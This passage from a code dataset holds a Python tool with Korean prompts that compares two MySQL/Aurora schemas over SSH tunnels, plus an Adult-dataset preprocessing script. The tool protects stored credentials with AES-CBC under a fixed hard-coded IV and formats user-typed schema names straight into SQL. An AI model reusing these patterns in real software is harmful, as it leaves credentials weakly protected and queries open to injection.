unittest.main()\n","sub_path":"test/unit/common/test_daemon.py","file_name":"test_daemon.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454502587","text":"# -*- coding: utf-8 -*-\nfrom sshtunnel import SSHTunnelForwarder \nimport pymysql,sys\nfrom base64 import b64encode,b64decode\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\nfrom hashlib import blake2b\nimport json\n\n\ndef encrypt_mytext(mytext,input_key):\n h = blake2b(digest_size=16)\n h.update(input_key.encode())\n key=h.hexdigest()\n #print(key)\n data=str(mytext)+\" \"\n cipher = AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef')\n padded_data = pad(data.encode(\"utf-8\"), cipher.block_size)\n encrypt_text = cipher.encrypt(padded_data)\n #print(encrypt_text) \n return b64encode(encrypt_text).decode(\"utf-8\")\n\n\ndef decrypt_mytext(encrypt_text,input_key):\n #print(ciphertext) \n h = blake2b(digest_size=16)\n h.update(input_key.encode())\n key=h.hexdigest()\n #print(key)\n ciphertext = b64decode(encrypt_text.encode(\"utf-8\"))\n cipher= AES.new(b64decode(key), AES.MODE_CBC, iv=b'0123456789abcdef')\n decrypt_text=str(cipher.decrypt(ciphertext).decode(\"utf-8\")).split(' ')[0]\n return decrypt_text\n\ndef read_conn_info(file_name):\n f = open(file_name, 'r')\n line = f.readline()\n encrypt_json=json.loads(line)\n input_enc_key=input(\"enc key: \")\n server_infos_dec={}\n for key,value1 in encrypt_json.items():\n #print(key)\n \n dec_key=decrypt_mytext(key,input_enc_key)\n server_infos_dec[dec_key]={}\n for key2,value2 in value1.items():\n dec_key2=decrypt_mytext(key2,input_enc_key)\n dec_value2=decrypt_mytext(value2,input_enc_key)\n server_infos_dec[dec_key][dec_key2]=dec_value2\n \n return server_infos_dec\ndef get_input_val(input_type):\n while True:\n input_val=input(input_type+\" 입력하세요: \")\n if(input_val != ''):\n return input_val\n print(\"공백입력은 안됩니다. 다시 입력해주세요.\")\n\ndef InputNumber(min_number,max_number):\n while True:\n try:\n number = int(input(\"숫자를 입력하세요: \"))\n if(number >=min_number and number <= max_number):\n return number\n \n print(str(min_number)+\"~\"+str(max_number)+\"까지 입력\")\n except Exception as ex:\n continue\ndef IsUseTunnel():\n print(\"###################################################################\")\n print(\" 1. 터널링사용\")\n print(\" 2. 터널링사용 안��\")\n input_val = InputNumber(1,2)\n print(\"###################################################################\")\n return input_val \ndef MakeTunnel(bastion_ip,bastion_user,bastion_pwd,endpoint):\n tunnel=SSHTunnelForwarder(\n (bastion_ip, 22),\n ssh_username=bastion_user,\n ssh_password=bastion_pwd,\n remote_bind_address=(endpoint, 3306)\n )\n return tunnel\n\ndef get_server_info(server_infos):\n\n for key,value in server_infos.items():\n print(key)\n\n source_server = get_input_val(\"source_server\")\n source_schema = get_input_val(\"source_schema\")\n target_server = get_input_val(\"target_server\")\n target_schema = get_input_val(\"target_schema\")\n server_info={}\n server_info[\"source_bastion_ip\"]=server_infos[source_server][\"source_bastion_ip\"]\n server_info[\"source_bastion_user\"]=server_infos[source_server][\"source_bastion_user\"]\n server_info[\"source_bastion_pwd\"]=server_infos[source_server][\"source_bastion_pwd\"]\n server_info[\"source_endpoint\"]=server_infos[source_server][\"source_endpoint\"]\n server_info[\"source_db_user\"]=server_infos[source_server][\"source_db_user\"]\n server_info[\"source_db_pwd\"]=server_infos[source_server][\"source_db_pwd\"]\n server_info[\"source_schema\"]=source_schema\n server_info[\"target_bastion_ip\"]=server_infos[target_server][\"source_bastion_ip\"]\n server_info[\"target_bastion_user\"]=server_infos[target_server][\"source_bastion_user\"]\n server_info[\"target_bastion_pwd\"]=server_infos[target_server][\"source_bastion_pwd\"]\n server_info[\"target_endpoint\"]=server_infos[target_server][\"source_endpoint\"]\n server_info[\"target_db_user\"]=server_infos[target_server][\"source_db_user\"]\n server_info[\"target_db_pwd\"]=server_infos[target_server][\"source_db_pwd\"]\n server_info[\"target_schema\"]=target_schema\n '''\n\n print(\"다시 입력은 AGAIN_\")\n input_list=[\"source_bastion_ip\",\n \"source_bastion_user\",\n \"source_bastion_pwd\",\n \"source_endpoint\",\n \"source_db_user\",\n \"source_db_pwd\",\n \"source_schema\",\n \"target_bastion_ip\",\n \"target_bastion_user\",\n \"target_bastion_pwd\",\n \"target_endpoint\",\n \"target_db_user\",\n \"target_db_pwd\",\n \"target_schema\"]\n i=0\n server_info={}\n while i < len(input_list) :\n input_val=get_input_val(input_list[i])\n if(input_val==\"AGAIN_\"):\n i=0\n continue\n server_info[input_list[i]] = input_val\n i=i+1\n '''\n\n return server_info\n\ndef get_connect_info(server_infos):\n for key,value in server_infos.items():\n print(key)\n\n source_server = get_input_val(\"source_server\")\n source_schema = get_input_val(\"source_schema\")\n target_server = get_input_val(\"target_server\")\n target_schema = get_input_val(\"target_schema\")\n server_info={}\n server_info[\"source_bastion_ip\"]=server_infos[source_server][\"source_bastion_ip\"]\n server_info[\"source_bastion_user\"]=server_infos[source_server][\"source_bastion_user\"]\n server_info[\"source_bastion_pwd\"]=server_infos[source_server][\"source_bastion_pwd\"]\n server_info[\"source_endpoint\"]=server_infos[source_server][\"source_endpoint\"]\n server_info[\"source_db_user\"]=server_infos[source_server][\"source_db_user\"]\n server_info[\"source_db_pwd\"]=server_infos[source_server][\"source_db_pwd\"]\n server_info[\"source_schema\"]=source_schema\n server_info[\"target_bastion_ip\"]=server_infos[target_server][\"source_bastion_ip\"]\n server_info[\"target_bastion_user\"]=server_infos[target_server][\"source_bastion_user\"]\n server_info[\"target_bastion_pwd\"]=server_infos[target_server][\"source_bastion_pwd\"]\n server_info[\"target_endpoint\"]=server_infos[target_server][\"source_endpoint\"]\n server_info[\"target_db_user\"]=server_infos[target_server][\"source_db_user\"]\n server_info[\"target_db_pwd\"]=server_infos[target_server][\"source_db_pwd\"]\n server_info[\"target_schema\"]=target_schema\n '''\n print(\"다시 입력은 AGAIN_\")\n input_list=[\"source_endpoint\",\n \"source_db_user\",\n \"source_db_pwd\",\n \"source_schema\",\n \"target_endpoint\",\n \"target_db_user\",\n \"target_db_pwd\",\n \"target_schema\"]\n i=0\n server_info={}\n while i < len(input_list) :\n input_val=get_input_val(input_list[i])\n if(input_val==\"AGAIN_\"):\n i=0\n continue\n server_info[input_list[i]] = input_val\n i=i+1\n '''\n return server_info\n\ndef compare_table(source_table_list,target_table_list,source_cursor):\n if len(source_table_list)==0:\n print(\"소스테이블없음\")\n return \"\",\"\"\n elif len(target_table_list)==0:\n print(\"타겟테이블없음\")\n return \"\",\"\"\n\n print(\"###### 테이블 비교 ##########\")\n #print(\"table_name,engine,row_format,table_collation,table_comment\")\n target_not_exists = \"''\"\n source_not_exists = \"''\"\n for source_table in source_table_list:\n sametable_flag=0\n for target_table in target_table_list:\n if source_table[0] == target_table[0]:\n sametable_flag=1\n if source_table != target_table:\n print(\"소스: \"+source_table[0] + ',' + source_table[1] + ',' + source_table[2] + ','+ source_table[3] + ',' + source_table[4])\n print(\"타겟: \"+target_table[0] + ',' + target_table[1] + ',' + target_table[2] + ','+ target_table[3] + ',' + target_table[4])\n if sametable_flag==0:\n target_not_exists=target_not_exists+\",'\"+source_table[0]+\"'\"\n print(\"#\"+source_table[0] + \" 테이블 타겟에 없음\")\n source_cursor.execute(\"show create table %s\"%(source_table[0])) \n print(source_cursor.fetchall()[0][1] + \";\")\n \n for target_table in target_table_list:\n sametable_flag=0\n for source_table in source_table_list:\n if source_table[0] == target_table[0]:\n sametable_flag=1\n if sametable_flag==0:\n source_not_exists=source_not_exists+\",'\"+target_table[0]+\"'\"\n print(\"#\"+target_table[0] + \" 테이블 소스에 없음\")\n print(\"drop table \"+target_table[0]+\";\")\n print(\"###### 테이블 비교 종료##########\")\n return target_not_exists,source_not_exists\n\ndef compare_column(source_column_list,target_column_list):\n \n print(\"###### 컬럼 비교 ##########\")\n #print(\"table_name,column_name,column_type,collation_name,column_comment,column_default\")\n i=0\n for source_column in source_column_list:\n samecolumn_flag=0\n for target_column in target_column_list:\n if source_column[0] == target_column[0] and source_column[1] == target_column[1]:\n samecolumn_flag=1\n if source_column != target_column:\n print(\"#소스: \"+str(source_column[0]) + ',' + str(source_column[1]) + ',' + str(source_column[2]) + ','+ str(source_column[3]) + ',' + str(source_column[4])+ ',' + str(source_column[5])+ ',' + str(source_column[6])+ ',' + str(source_column[7]))\n print(\"#타겟: \"+str(target_column[0]) + ',' + str(target_column[1]) + ',' + str(target_column[2]) + ','+ str(target_column[3]) + ',' + str(target_column[4])+ ',' + str(target_column[5])+ ',' + str(target_column[6])+ ',' + str(target_column[7]))\n if(str(source_column[6]) == \"YES\"):\n null_option=\" NULL\"\n else:\n null_option=\"NOT NULL\"\n print(\"ALTER TABLE \"+ source_column[0] + \" CHANGE COLUMN `\"+ source_column[1] + \"` \" )\n print(\"`\" + source_column[1] + \"` \"+ str(source_column[2]) + \" \" + null_option + \" \" + str(source_column[7]))\n if(str(source_column[5]) != \"None\" ):\n print(\"default \" + str(source_column[5]) )\n print(\"comment '\" + str(source_column[4]) + \"';\" )\n if samecolumn_flag==0:\n print(\"#\"+source_column[0] + \":\"+source_column[1] + \" 컬럼 타겟에 없음\")\n if(str(source_column[6]) == \"YES\"):\n null_option=\" NULL\"\n else:\n null_option=\"NOT NULL\"\n\n print('ALTER TABLE '+ source_column[0] + \" ADD COLUMN \"+ source_column[1] + \" \" + str(source_column[2]) + \" \" + null_option + \" \" + str(source_column[7]))\n if(str(source_column[5]) != \"None\" ):\n print(\"default \" + str(source_column[5]) )\n\n print(\"comment '\" + str(source_column[4]) + \"'\" )\n print(\"AFTER `\" + source_column_list[i-1][1] + \"`;\")\n\n\n i=i+1\n \n for target_column in target_column_list:\n samecolumn_flag=0\n for source_column in source_column_list:\n if source_column[0] == target_column[0] and source_column[1] == target_column[1]:\n samecolumn_flag=1\n if samecolumn_flag==0:\n print(\"#\"+target_column[0] + \":\"+target_column[1] +\" 컬럼 소스에 없음\")\n print(\"ALTER TABLE \"+target_column[0] + \" drop column `\" + target_column[1] + \"`;\")\n print(\"###### 컬럼 비교 종료##########\")\n\ndef compare_index(source_index_list,target_index_list):\n print(\"###### 인덱스 비교 ##########\")\n #print(\"table_name,index_name,max(NON_UNIQUE) unique_flag,GROUP_CONCAT(index_name order by seq_in_index,',') index_list\")\n for source_index in source_index_list:\n sameindex_flag=0\n for target_index in target_index_list:\n if source_index[0] == target_index[0] and source_index[1] == target_index[1]:\n sameindex_flag=1\n if source_index != target_index:\n print(\"#소스: \"+source_index[0] + ',' + source_index[1] + ',' + str(source_index[2]) + ','+ source_index[3] )\n print(\"#타겟: \"+target_index[0] + ',' + target_index[1] + ',' + str(target_index[2]) + ','+ target_index[3] )\n if source_index[1] == \"PRIMARY\":\n print(\"ALTER TABLE \"+ source_index[0] + \" drop \" + source_index[1] + \" key;\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add \" + source_index[1] + \" key(\" + source_index[3] + \");\")\n else:\n print(\"ALTER TABLE \"+ source_index[0] + \" drop index \" + source_index[1] + \";\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add index \" + source_index[1] + \"(\" + source_index[3] + \");\")\n if sameindex_flag==0:\n print(\"#\"+source_index[0] + \":\"+source_index[1] + \" 인덱스 타겟에 없음\")\n print(\"ALTER TABLE \"+ source_index[0] + \" add index \" + source_index[1] + \"(\" + source_index[3] + \");\")\n \n for target_index in target_index_list:\n sameindex_flag=0\n for source_index in source_index_list:\n if source_index[0] == target_index[0] and source_index[1] == target_index[1]:\n sameindex_flag=1\n if sameindex_flag==0:\n print(\"#\"+target_index[0] + \":\"+target_index[1] +\" 인덱스 소스에 없음\")\n print(\"ALTER TABLE \"+ target_index[0] + \" drop index \" + target_index[1] + \";\")\n print(\"###### 인덱스비교 종료##########\")\n\ndef compare_routine(source_routine_list,target_routine_list):\n\n if len(source_routine_list)==0 and len(target_routine_list)==0:\n return 0\n\n print(\"###### 루틴 비교(function,procedure) ##########\")\n\n for source_routine in source_routine_list:\n sameroutine_flag=0\n for target_routine in target_routine_list:\n if source_routine[0] == target_routine[0]:\n sameroutine_flag=1\n if source_routine != target_routine:\n print(\"소스: \"+source_routine[0] + ',' + source_routine[1] + ',' + source_routine[2] )\n print(\"타겟: \"+target_routine[0] + ',' + target_routine[1] + ',' + target_routine[2] )\n if sameroutine_flag==0:\n print(source_routine[0] + \" 타겟에 없음\")\n \n for target_routine in target_routine_list:\n sameroutine_flag=0\n for source_routine in source_routine_list:\n #print(source_routine[0] + \",\" + target_routine[0])\n if source_routine[0] == target_routine[0]:\n sameroutine_flag=1\n \n if sameroutine_flag==0:\n print(target_routine[0] + \" 소스에 없음\")\n\ndef compare_colpriv(source_colpriv_list,target_colpriv_list):\n print(\"###### 컬럼권한 비교(function,procedure) ##########\")\n\n for source_colpriv in source_colpriv_list:\n samecolpriv_flag=0\n for target_colpriv in target_colpriv_list:\n if (source_colpriv[0] == target_colpriv[0] \n and source_colpriv[1] == target_colpriv[1]\n and source_colpriv[2] == target_colpriv[2]):\n samecolpriv_flag=1\n if source_colpriv != target_colpriv:\n print(\"소스: \"+source_colpriv[0] + ',' + source_colpriv[1] + ',' + source_colpriv[2]+ ',' + source_colpriv[3]+ ',' + source_colpriv[4] )\n print(\"타겟: \"+target_colpriv[0] + ',' + target_colpriv[1] + ',' + target_colpriv[2]+ ',' + target_colpriv[3]+ ',' + target_colpriv[4] )\n if samecolpriv_flag==0:\n print(source_colpriv[0] + ',' + source_colpriv[1] + ',' + source_colpriv[2]+ ',' + source_colpriv[3]+ ',' + source_colpriv[4] + \" 타겟에 없음\")\n \n for target_colpriv in target_colpriv_list:\n samecolpriv_flag=0\n for source_colpriv in source_colpriv_list:\n if (source_colpriv[0] == target_colpriv[0] \n and source_colpriv[1] == target_colpriv[1]\n and source_colpriv[2] == target_colpriv[2]):\n samecolpriv_flag=1\n if samecolpriv_flag==0:\n print(target_colpriv[0] + ',' + target_colpriv[1] + ',' + target_colpriv[2]+ ',' + target_colpriv[3]+ ',' + target_colpriv[4] + \" 소스에 없음\")\n\ndef compare_schpriv(source_schpriv_list,target_schpriv_list):\n print(\"###### 스키마권한 비교(function,procedure) ##########\")\n\n for source_schpriv in source_schpriv_list:\n sameschpriv_flag=0\n for target_schpriv in target_schpriv_list:\n if (source_schpriv[0] == target_schpriv[0] \n and source_schpriv[1] == target_schpriv[1]):\n sameschpriv_flag=1\n if source_schpriv != target_schpriv:\n print(\"소스: \"+source_schpriv[0] + ',' + source_schpriv[1] + ',' + source_schpriv[2] )\n print(\"타겟: \"+target_schpriv[0] + ',' + target_schpriv[1] + ',' + target_schpriv[2] )\n if sameschpriv_flag==0:\n print(source_schpriv[0] + ',' + source_schpriv[1] + ',' + source_schpriv[2] + \" 타겟에 없음\")\n \n for target_schpriv in target_schpriv_list:\n sameschpriv_flag=0\n for source_schpriv in source_schpriv_list:\n if (source_schpriv[0] == target_schpriv[0] \n and source_schpriv[1] == target_schpriv[1]):\n sameschpriv_flag=1\n if sameschpriv_flag==0:\n print(target_schpriv[0] + ',' + target_schpriv[1] + ',' + target_schpriv[2] + \" 소스에 없음\")\n\ndef compare_tabpriv(source_tabpriv_list,target_tabpriv_list):\n print(\"###### 테이블권한 비교(function,procedure) ##########\")\n\n for source_tabpriv in source_tabpriv_list:\n sametabpriv_flag=0\n for target_tabpriv in target_tabpriv_list:\n if (source_tabpriv[0] == target_tabpriv[0] \n and source_tabpriv[1] == target_tabpriv[1]\n and source_tabpriv[2] == target_tabpriv[2]):\n sametabpriv_flag=1\n if source_tabpriv != target_tabpriv:\n print(\"소스: \"+source_tabpriv[0] + ',' + source_tabpriv[1] + ',' + source_tabpriv[2] + ',' + source_tabpriv[3])\n print(\"타겟: \"+target_tabpriv[0] + ',' + target_tabpriv[1] + ',' + target_tabpriv[2] + ',' + target_tabpriv[3])\n if sametabpriv_flag==0:\n print(source_tabpriv[0] + ',' + source_tabpriv[1] + ',' + source_tabpriv[2]+ ',' + source_tabpriv[3] + \" 타겟에 없음\")\n \n for target_tabpriv in target_tabpriv_list:\n sametabpriv_flag=0\n for source_tabpriv in source_tabpriv_list:\n if (source_tabpriv[0] == target_tabpriv[0] \n and source_tabpriv[1] == target_tabpriv[1]\n and source_tabpriv[2] == target_tabpriv[2]):\n sametabpriv_flag=1\n if sametabpriv_flag==0:\n print(target_tabpriv[0] + ',' + target_tabpriv[1] + ',' + target_tabpriv[2]+ ',' + target_tabpriv[3] + \" 소스에 없음\")\n\n\n\n\nif __name__=='__main__':\n try:\n file_name = \"conn_info.json\"\n server_infos=read_conn_info(file_name)\n\n\n TUNNEL_FLAG=0\n CONNECT_FLAG=0\n use_tunnel_flag = IsUseTunnel()\n if(use_tunnel_flag == 1):\n server_info=get_server_info(server_infos)\n\n source_tunnel = MakeTunnel(server_info[\"source_bastion_ip\"],server_info[\"source_bastion_user\"],server_info[\"source_bastion_pwd\"],server_info[\"source_endpoint\"])\n target_tunnel = MakeTunnel(server_info[\"target_bastion_ip\"],server_info[\"target_bastion_user\"],server_info[\"target_bastion_pwd\"],server_info[\"target_endpoint\"])\n source_tunnel.start()\n TUNNEL_FLAG=1\n target_tunnel.start()\n server_info[\"source_connect_ip\"]='127.0.0.1'\n server_info[\"target_connect_ip\"]='127.0.0.1'\n server_info[\"source_connect_port\"]=source_tunnel.local_bind_port\n server_info[\"target_connect_port\"]=target_tunnel.local_bind_port\n print(\"ASIS 터널링포트: \"+str(source_tunnel.local_bind_port)+\" ,TOBE 터널링포트: \" + str(target_tunnel.local_bind_port))\n #터널링 커넥션\n source_conn = pymysql.connect(host='127.0.0.1', port=server_info[\"source_connect_port\"], user=server_info[\"source_db_user\"], password=server_info['source_db_pwd'],db=server_info['source_schema'],charset='UTF8')\n target_conn = pymysql.connect(host='127.0.0.1', port=server_info[\"target_connect_port\"], user=server_info[\"target_db_user\"], password=server_info['target_db_pwd'],db=server_info['target_schema'],charset='UTF8')\n #Source 스키마 리스트 저장\n source_cursor = source_conn.cursor()\n target_cursor = target_conn.cursor()\n CONNECT_FLAG=1\n elif(use_tunnel_flag == 2):\n server_info=get_connect_info(server_infos)\n server_info[\"source_connect_ip\"]=server_info[\"source_endpoint\"]\n server_info[\"target_connect_ip\"]=server_info[\"target_endpoint\"]\n server_info[\"source_connect_port\"]=3306\n server_info[\"target_connect_port\"]=3306\n source_conn = pymysql.connect(host=server_info[\"source_endpoint\"], port=3306, user=server_info[\"source_db_user\"], password=server_info['source_db_pwd'],db=server_info['source_schema'], charset='UTF8')\n target_conn = pymysql.connect(host=server_info[\"target_endpoint\"], port=3306, user=server_info[\"target_db_user\"], password=server_info['target_db_pwd'],db=server_info['target_schema'], charset='UTF8')\n #Source 스키마 리스트 저장\n source_cursor = source_conn.cursor()\n target_cursor = target_conn.cursor()\n CONNECT_FLAG=1\n\n table_list_query = \"select upper(table_name),engine,row_format,table_collation,table_comment from information_schema.tables where table_schema='%s'\"\n column_list_query = \"select upper(table_name),upper(column_name),column_type,collation_name,column_comment,column_default,is_nullable,ifnull(extra,'') from information_schema.columns where table_schema='%s' and table_name not in (%s) order by table_schema,table_name,ordinal_position\"\n count_query='select count(1) from %s.%s'\n index_list_query=\"select upper(table_name),upper(index_name),max(NON_UNIQUE) unique_flag,GROUP_CONCAT(column_name order by seq_in_index,',') column_list\\n\" \n index_list_query=index_list_query + \"from information_schema.STATISTICS\\n\"\n index_list_query=index_list_query + \"where table_schema='%s' and table_name not in (%s)\\n\"\n index_list_query=index_list_query + \"group by table_name,index_name\"\n routine_list_query=\"select routine_name,routine_type,md5(ROUTINE_DEFINITION) routine_md5 from information_schema.ROUTINES where routine_schema='%s'\"\n column_privilege_query=\"select grantee,upper(table_name),upper(column_name),privilege_type,is_grantable from information_schema.COLUMN_PRIVILEGES where table_schema='%s'\"\n schema_privilege_query=\"select grantee,privilege_type,is_grantable from information_schema.SCHEMA_PRIVILEGES where table_schema='%s'\"\n table_privilege_query=\"select grantee,upper(table_name),privilege_type,is_grantable from information_schema.TABLE_PRIVILEGES where table_schema='%s'\"\n \n #테이블리스트\n source_cursor.execute(table_list_query%(server_info[\"source_schema\"])) \n source_table_list=source_cursor.fetchall()\n target_cursor.execute(table_list_query%(server_info[\"target_schema\"])) \n target_table_list=target_cursor.fetchall()\n\n target_not_exists,source_not_exists=compare_table(source_table_list,target_table_list,source_cursor)\n\n if(target_not_exists!=\"\"):\n '''\n #카운트비교\n print(\"########건수비교##########\")\n for source_table in source_table_list:\n not_exists_flag=0\n for target_not_exists_table in target_not_exists.replace(\"'\",\"\").split(\",\"):\n if source_table[0]==target_not_exists_table:\n not_exists_flag=1\n \n if not_exists_flag==0:\n source_cursor.execute(count_query%(server_info[\"source_schema\"],source_table[0]))\n source_count=source_cursor.fetchall()\n target_cursor.execute(count_query%(server_info[\"target_schema\"],source_table[0]))\n target_count=target_cursor.fetchall()\n if source_count != target_count:\n print(source_table[0] + \" 소스건수:\" + str(source_count[0][0]) + \" , 타겟건수:\" + str(target_count[0][0]))\n '''\n #컬럼비교\n source_cursor.execute(column_list_query%(server_info[\"source_schema\"],target_not_exists)) \n source_column_list=source_cursor.fetchall()\n target_cursor.execute(column_list_query%(server_info[\"target_schema\"],source_not_exists)) \n target_column_list=target_cursor.fetchall()\n compare_column(source_column_list,target_column_list)\n #인덱스비교\n source_cursor.execute(index_list_query%(server_info[\"source_schema\"],target_not_exists)) \n source_index_list=source_cursor.fetchall()\n target_cursor.execute(index_list_query%(server_info[\"target_schema\"],source_not_exists)) \n target_index_list=target_cursor.fetchall()\n compare_index(source_index_list,target_index_list)\n #루틴비교\n source_cursor.execute(routine_list_query%(server_info[\"source_schema\"])) \n source_routine_list=source_cursor.fetchall()\n target_cursor.execute(routine_list_query%(server_info[\"target_schema\"])) \n target_routine_list=target_cursor.fetchall()\n compare_routine(source_routine_list,target_routine_list)\n\n #컬럼권한비교\n source_cursor.execute(column_privilege_query%(server_info[\"source_schema\"])) \n source_colpriv_list=source_cursor.fetchall()\n target_cursor.execute(column_privilege_query%(server_info[\"target_schema\"])) \n target_colpriv_list=target_cursor.fetchall()\n compare_colpriv(source_colpriv_list,target_colpriv_list)\n\n #스키마권한비교\n source_cursor.execute(schema_privilege_query%(server_info[\"source_schema\"])) \n source_schpriv_list=source_cursor.fetchall()\n target_cursor.execute(schema_privilege_query%(server_info[\"target_schema\"])) \n target_schpriv_list=target_cursor.fetchall()\n compare_schpriv(source_schpriv_list,target_schpriv_list)\n\n #테이블권한비교\n source_cursor.execute(table_privilege_query%(server_info[\"source_schema\"])) \n source_tabpriv_list=source_cursor.fetchall()\n target_cursor.execute(table_privilege_query%(server_info[\"target_schema\"])) \n target_tabpriv_list=target_cursor.fetchall()\n compare_tabpriv(source_tabpriv_list,target_tabpriv_list)\n\n if(TUNNEL_FLAG==1):\n source_tunnel.stop()\n target_tunnel.stop()\n \n\n\n except Exception as ex:\n if(TUNNEL_FLAG==1):\n source_tunnel.stop()\n target_tunnel.stop()\n print(ex)\n sys.exit()\n\n\n","sub_path":"Aurora/compare_aurora/compare_aurora.py","file_name":"compare_aurora.py","file_ext":"py","file_size_in_byte":27662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"66091218","text":"import numpy as np\nimport sys\nimport random\nfrom datetime import datetime\n\n# print('Number of arguments:', len(sys.argv), 'arguments.')\n# print('Argument List:', str(sys.argv))\n\n# 生成数据\n#\nK = 14\nC = 2\n\nlabel = {'>': '+1', '<': '-1'}\nworkclass = {'?': 0, 'Private': 1, 'Self-emp-not-inc': 2, 'Self-emp-inc': 3, 'Federal-gov': 4, 'Local-gov': 5,\n\t\t\t 'State-gov': 6, 'Without-pay': 7, 'Never-worked': 8}\neducation = {'?': 0, 'Bachelors': 1, 'Some-college': 2, '11th': 3, 'HS-grad': 4, 'Prof-school': 5, 'Assoc-acdm': 6,\n\t\t\t 'Assoc-voc': 7, '9th': 8, '7th-8th': 9, '12th': 10,\n\t\t\t 'Masters': 11, '1st-4th': 12, '10th': 13, 'Doctorate': 14, '5th-6th': 15, 'Preschool': 16}\nmarital_status = {'?': 0, 'Married-civ-spouse': 1, 'Divorced': 2, 'Never-married': 3, 'Separated': 4, 'Widowed': 5,\n\t\t\t\t 'Married-spouse-absent': 6, 'Married-AF-spouse': 7}\noccupation = {'?': 0, 'Tech-support': 1, 'Craft-repair': 2, 'Other-service': 3, 'Sales': 4, 'Exec-managerial': 5,\n\t\t\t 'Prof-specialty': 6, 'Handlers-cleaners': 7,\n\t\t\t 'Machine-op-inspct': 8, 'Adm-clerical': 9, 'Farming-fishing': 10, 'Transport-moving': 11,\n\t\t\t 'Priv-house-serv': 12, 'Protective-serv': 13, 'Armed-Forces': 14}\nrelationship = {'?': 0, 'Wife': 1, 'Own-child': 2, 'Husband': 3, 'Not-in-family': 4, 'Other-relative': 5,\n\t\t\t\t'Unmarried': 6}\nrace = {'?': 0, 'White': 1, 'Asian-Pac-Islander': 2, 'Amer-Indian-Eskimo': 3, 'Other': 4, 'Black': 5}\nsex = {'?': 0, 'Female': 1, 'Male': 2}\nnative_country = {'?': 0, 'United-States': 1, 'Cambodia': 2, 'England': 3, 'Puerto-Rico': 4, 'Canada': 5, 'Germany': 6,\n\t\t\t\t 'Outlying-US(Guam-USVI-etc)': 7, 'India': 8,\n\t\t\t\t 'Japan': 9, 'Greece': 10, 'South': 11, 'China': 12, 'Cuba': 13, 'Iran': 14, 'Honduras': 15,\n\t\t\t\t 'Philippines': 16, 'Italy': 17, 'Poland': 18,\n\t\t\t\t 'Jamaica': 19, 'Vietnam': 20, 'Mexico': 21, 'Portugal': 22, 'Ireland': 23, 'France': 24,\n\t\t\t\t 'Dominican-Republic': 25, 'Laos': 26, 'Ecuador': 27,\n\t\t\t\t 'Taiwan': 28, 'Haiti': 29, 'Columbia': 30, 'Hungary': 31, 'Guatemala': 32, 'Nicaragua': 33,\n\t\t\t\t 'Scotland': 34, 'Thailand': 35, 'Yugoslavia': 36,\n\t\t\t\t 'El-Salvador': 37, 'Trinadad&Tobago': 38, 'Peru': 39, 'Hong': 40, 'Holand-Netherlands': 41}\n\n\ndef create_datafiles(do_num, file_num, data_points):\n\twith open(\"DataFiles/DO\" + str(do_num) + \"_\" + str(file_num) + \".txt\", \"w\") as file_out:\n\t\t# Randomly shuffle so that DO gets different data for every generation\n\t\trandom.seed(datetime.now())\n\t\trand_idx = list(range(30000))\n\t\trandom.shuffle(rand_idx)\n\n\t\tdata = np.empty((data_points, K + 1))\n\n\t\tfor i in range(data_points):\n\t\t\twords = data_lines[rand_idx[i]].split(', ')\n\t\t\t# print(words)\n\n\t\t\t# Label\n\t\t\tdata[i][0] = label[words[14][0]]\n\n\t\t\t# Feature 1: age\n\t\t\tdata[i][1] = int(words[0])\n\n\t\t\t# Feature 2: workclass\n\t\t\tdata[i][2] = workclass[words[1]]\n\n\t\t\t# Feature 3: fnlwgt\n\t\t\tdata[i][3] = int(words[2])\n\n\t\t\t# Feature 4: education\n\t\t\tdata[i][4] = education[words[3]]\n\n\t\t\t# Feature 5: education-num\n\t\t\tdata[i][5] = int(words[4])\n\n\t\t\t# Feature 6: marital-status\n\t\t\tdata[i][6] = marital_status[words[5]]\n\n\t\t\t# Feature 7: occupation\n\t\t\tdata[i][7] = occupation[words[6]]\n\n\t\t\t# Feature 8: relationship\n\t\t\tdata[i][8] = relationship[words[7]]\n\n\t\t\t# Feature 9: race\n\t\t\tdata[i][9] = race[words[8]]\n\n\t\t\t# Feature 10: sex\n\t\t\tdata[i][10] = sex[words[9]]\n\n\t\t\t# Feature 11: capital-gain\n\t\t\tdata[i][11] = int(words[10])\n\n\t\t\t# Feature 12: capital-loss\n\t\t\tdata[i][12] = int(words[11])\n\n\t\t\t# Feature 13: hours-per-week\n\t\t\tdata[i][13] = int(words[12])\n\n\t\t\t# Feature 14: native-country\n\t\t\tdata[i][14] = native_country[words[13]]\n\n\t\tprint('N = ' + str(data_points) + ', K = ' + str(K) + ', C = ' + str(C))\n\t\t# print(data)\n\n\t\t# Normalize data to -1:+1\n\t\tmin_row = np.min(data, 0)\n\t\tmax_row = np.max(data, 0)\n\t\tdata = 2 * (data - min_row) / (max_row - min_row) - 1\n\n\t\t# print(data)\n\n\t\t# Convert to string\n\t\tdata_string = str(data_points) + ' ' + str(K) + ' ' + str(C) + ' '\n\n\t\tfor i in range(data_points):\n\t\t\tdata_string = data_string + '\\n'\n\t\t\tif data[i][0] == 1:\n\t\t\t\tdata_string = data_string + '+1 '\n\t\t\telse:\n\t\t\t\tdata_string = data_string + '-1 '\n\n\t\t\tfor j in range(K):\n\t\t\t\tdata_string = data_string + str(j + 1) + ':' + str(np.round(data[i, j + 1], 6)) + ' '\n\n\t\t# print(data_string)\n\n\t\t# Save file\n\t\tfile_out.write(data_string)\n\n\nif __name__ == '__main__':\n\t# 每个文件中的数据量\n\twith open(\"../CloudStorage/Reserved_ML_Data/adult.txt\", \"r\") as file_in:\n\t\t# file_out = open(\"data/102.txt\", \"w\")\n\t\tdata_lines = file_in.readlines()\n\n\t# 创建一个文件含有30000条数据\n\tcreate_datafiles(0, 1, 30000)\n\n\tfor i in range(2):\n\t\tcreate_datafiles(2, i+1, 15000)\n\n\tfor i in range(3):\n\t\tcreate_datafiles(3, i+1, 15000)\n\n\tfor i in range(5):\n\t\tcreate_datafiles(5, i+1, 6000)\n\n\tfor i in range(10):\n\t\tcreate_datafiles(10, i+1, 3000)\n\n\tfor i in range(15):\n\t\tcreate_datafiles(15, i+1, 2000)\n\n\tfor i in range(20):\n\t\tcreate_datafiles(20, i+1, 1500)\n\n\tfor 